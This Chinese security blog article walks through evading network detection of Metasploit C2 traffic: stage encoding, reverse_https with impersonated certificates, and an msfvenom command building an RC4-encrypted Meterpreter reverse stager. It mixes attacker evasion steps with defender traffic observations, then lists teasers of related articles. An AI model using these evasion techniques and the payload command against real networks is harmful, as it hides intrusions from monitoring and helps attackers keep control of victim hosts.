Metasploit 规避网络检测_C2 Antiforensics

VSole2023-05-12 08:56:10

我想强调Metasploit,因为它被渗透测试人员、红队队员广泛使用和熟知,但也被包括FIN 组在内的许多威胁参与者使用。有时我觉得人们可能会低估这个框架的使用,那你就错了。

这次我们将扮演红队操作员或威胁参与者的角色,我们将经历通常包括反取证的入侵过程与 TA0005 和 TA0011 战术(防御规避和指挥与控制)相关。

这是一个示例包含一个 PowerShell 脚本来生成反向 shell 连接。在此活动检查流量之后,我们能通过流量检测工具识别会话期间所有已执行的命令。

在上图中,我们可以轻松地以明文形式发现发送和接收的命令,揭示可能由连接到网络中 SIEM 的 IDS、TAP/端口镜像设备记录的入侵活动。

在下一个示例中,我们将从两个角度分析使用Meterpreter等代理时会发生什么。

这些是用于第一个测试的选项:

现在的问题是这些命令是否可见,以及可以从 C2 活动中发现哪些元素。现在让我们在初始阶段启动后检查流量。

在 TCP 握手之后,我们观察到成功的通信正在进行。在 TCP 流中,我们可以看到一个 HTTP GET 请求来下载一个包含非常有趣数据的文件。

我们可以观察到包含MZ 标头后跟DOS存根的资源的可能异常路径。如果我们继续查看 HTTP 响应中的数据,有一个字符串(在上图中不可见)可以确认发生了什么:二进制文件中对metsrv.dll的引用,这表明此活动是文件下载Metasploit的Meterpreter

但是,如果我们继续观察流量,我们会注意到即使活动是连续的,也没有观察到有价值的数据。

如果这是一个 HTTP 暂存器,为什么会发生这种情况?如果这是 HTTP,那么数据也应该像第一张图片一样可见,对吧?下载 Meterpreter 后,使用反射注入(T1055)将其加载到内存中,并在执行后metsrv对套接字执行 SSL 协商,这意味着即使攻击者使用reverse_tcp有效负载,流量也会默认加密。

在攻击者的控制台中,Meterpreter工作正常,如下所示

在大多数情况下,如果一个 IDS 正在运行,这个活动就会很快被检测到,这意味着作为攻击者我们会发出警报,而且我们可能会失去在两个主机中的存在。

但是,在不使用其他模块的情况下,有一个选项可以隐藏我们正在下载包含Meterpreter的二进制文件这一事实,使用我们的multi/handler模块上的以下选项,命名为stageencoderenablestageencoding,我们将在下一个测试中使用如下。

交付第一阶段后,让我们检查网络流量捕获并观察在传输Meterpreter dll 过程中发生了什么变化。

相同的相应阶段现在使用对防御者无用的数据进行编码,以识别从 IP 地址 10.16.4.192 下载的内容,换句话说,这意味着在这种情况下,攻击者将能够绕过旨在攻击的suricata签名在Meterpreter上,使我们的频道更安全,并减少通过网络命中被检测到的机会。

当然,Metasploit提供了比 TCP reverse_shellMeterpreter reverse_tcp更安全的不同模块,但是这些模块非常方便,因为生成的 shellcode 的大小和使用的 API 调用来使用套接字进行通信(TCP)而不是依赖于HTTP 流量。

通常用于逃避网络检测的选项之一是 TLS,我们在Metasploit中也有一个有效负载。模块reverse_https使用Metasploit创建的自签名证书或自定义证书来建立 TLS 通信。注意:数据已加密,但请记住从未验证过。

检查的流量显示它在 SSL 握手后立即开始。然而,在这种情况下,我们会留下精心制作默认证书的痕迹,这些证书也可以进行调查,这可能会导致基础设施或受到 IDS/IPS 签名的攻击。

要使用不同的证书,作为攻击者,我们可以购买一个或使用自签名证书,但Metasploit包含一个名为impersonate_ssl的有用辅助模块,我们可以在其中提供不同的设置来创建假证书:

避免使用 SSL 证书和模拟的可能风险的另一个选项是使用恶意软件作者通常用来逃避检测的不同 C2 通道:使用RC4 加密流量。

Metasploit RC4 模块包含不同的选项(bind、reverse_tcp 等),其中包括使用此算法来加密流量。这些模块包括对x86x64上的Meterpreter的支持,shell (cmd) 等。

在此示例中,我们将使用Meterpreter 反向 tcp有效负载来测试我们的规避能力。要创建第一个 stager,msfvenom需要以下选项:


msfvenom -p windows/meterpreter/reverse_tcp_rc4 rc4password= LHOST= LPORT= -f  -o rc4tes t

在攻击者机器上,正确设置处理程序需要以下选项:

正如我们所看到的,这些选项是常用的,唯一需要的额外选项是密码,可以使用命令“set RC4PASSWORD yourpassword”来设置

确保在 stager 和 handler 中正确设置了密码,否则通信将失败并消耗受害者主机上的资源,这可能会引发警报。

在执行我们的初始阶段后,Meterpreter被成功下载并执行,允许我们运行命令。但是,交通情况如何?我们是否正确隐藏了活动?

从防御者的角度来看,检查这些流量非常令人失望,因为这只是 TCP 流量、随机字节,从取证的角度来看,这里没有任何有用的东西。

如果作为攻击者,我们从网络角度(初始下载)使第一个 stager 无法检测,例如在具有 HTTPS、网站、CDN 等的网络服务器中提供它。如果有效负载是我们的通信呼叫回家的机会很高针对目标 AV 进行测试,或者如果主机不使用一个。多个选项可用于仅使用Metasploit执行规避,无需进行花哨的修改。

从防守者的角度来看,这就是结束了吗?当然不是。防火墙、代理和其他设备能够执行深度数据包检测,即使流量被加密,蓝队也能识别威胁(仅限 TLS,对于 RC4 流量,深度数据包检测不起作用)。

了解网络中的内容(设备、应用程序等)也将有助于在查看网络捕获和日志时识别环境中的异常流量。

metasploit流量
本作品采用《CC 协议》,转载必须注明作者和本文链接
在此活动检查流量之后,我们能通过流量检测工具识别会话期间所有已执行的命令。现在让我们在初始阶段启动后检查流量。在 TCP 握手之后,我们观察到成功的通信正在进行。检查的流量显示它在 SSL 握手后立即开始。然而,在这种情况下,我们会留下精心制作或默认证书的痕迹,这些证书也可以进行调查,这可能会导致基础设施或受到 IDS/IPS 签名的攻击。在此示例中,我们将使用Meterpreter 反向 tcp有效负载来测试我们的规避能力。
CS的流量行为特征
2022-07-21 13:45:40
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
CS 域前置+流量混淆
2021-10-14 06:58:22
域前置(Domain Fronting)被称为域前端网络攻击技术,是一种隐藏连接真实端点来规避互联网审查的技术。这种技术被安全人员多用来隐藏 Metasploit,Cobalt Strike 等团队控制服务器流量, 以此来一定程度绕过检查器或防火墙检测的技术,国内外如:Amazon ,Google,Akamai 等大型厂商都会提供一些域前端技术服务。
MSF+生成流量免杀木马
2022-01-14 11:34:16
在实战中,即便你绕过了杀毒软件的检测,也很有可能会结束在某些流量监控的设备上。MSF可以说其是每一个内网玩家的必用工具。理所当然,这款工具也自然而然地被各大安全厂商分析,捕捉其在命令执行时产生的数据和流量。当我们使用一个没有做过加密处理的原版工具时,内网中的安全设备会根据我们的流量特征进行判断,认定我们为恶意进程,从而导致控制中断。Meterpreter技巧生成后门msfvenom?
本文为内测第一周结束后内网学员的学习笔记,后续本公众号会持续更新其他课程学员学习笔记。对课程感兴趣,请添加文末小助手微信咨询。0x01 MSF安装和升级 最近mac本机和linux服务器上的msf在执行msfupdate命令以后都出现了不同程度的玄学问题,于是卸了重装。
对 RAT 类恶意软件流量的发现始终是威胁检测的核心命题,也是攻防对抗的前沿热点。通过多种特征使用机器学习的方法尽可能地发现此类流量,是被寄予厚望的研究方向。
0x00 介绍工具介绍RedGuard,是一款C2设施前置流量控制技术的衍生作品,有着更加轻量的设计、高效的流量交互、以及使用go语言开发具有的可靠兼容性。它所解决的核心问题也是在面对日益复杂的红蓝攻防演练行动中,给予攻击队更加优秀的C2基础设施隐匿方案,赋予C2设施的交互流量流量控制功能,拦截那些“恶意”的分析流量,更好的完成整个攻击任务。RedGuard是一个C2设施前置流量控制工具,可以避免Blue Team,AVS,EDR,Cyberspace Search Engine的检查。
0x00 介绍工具介绍RedGuard,是一款C2设施前置流量控制技术的衍生作品,有着更加轻量的设计、高效的流量交互、以及使用go语言开发具有的可靠兼容性。它所解决的核心问题也是在面对日益复杂的红蓝攻防演练行动中,给予攻击队更加优秀的C2基础设施隐匿方案,赋予C2设施的交互流量流量控制功能,拦截那些“恶意”的分析流量,更好的完成整个攻击任务。RedGuard是一个C2设施前置流量控制工具,可以避免Blue Team,AVS,EDR,Cyberspace Search Engine的检查。
内网渗透-代理篇
2021-12-01 05:44:01
利用代理工具将内网的流量代理到本地进行访问,这样就可以对内网进行下一步渗透,同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。代理的本质是Socks协议(防火墙安全会话转换协议),工作在OSI参考模型的第5层(会话层)。使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS5两个版本:
RedGuard,是一款C2设施前置流量控制技术的衍生作品,有着更加轻量的设计、高效的流量交互、以及使用go语言开发具有的可靠兼容性。它所解决的核心问题也是在面对日益复杂的红蓝攻防演练行动中,给予攻击队更加优秀的C2基础设施隐匿方案,赋予C2设施的交互流量流量控制功能,拦截那些“恶意”的分析流量,更好的完成整个攻击任务。
VSole
网络安全专家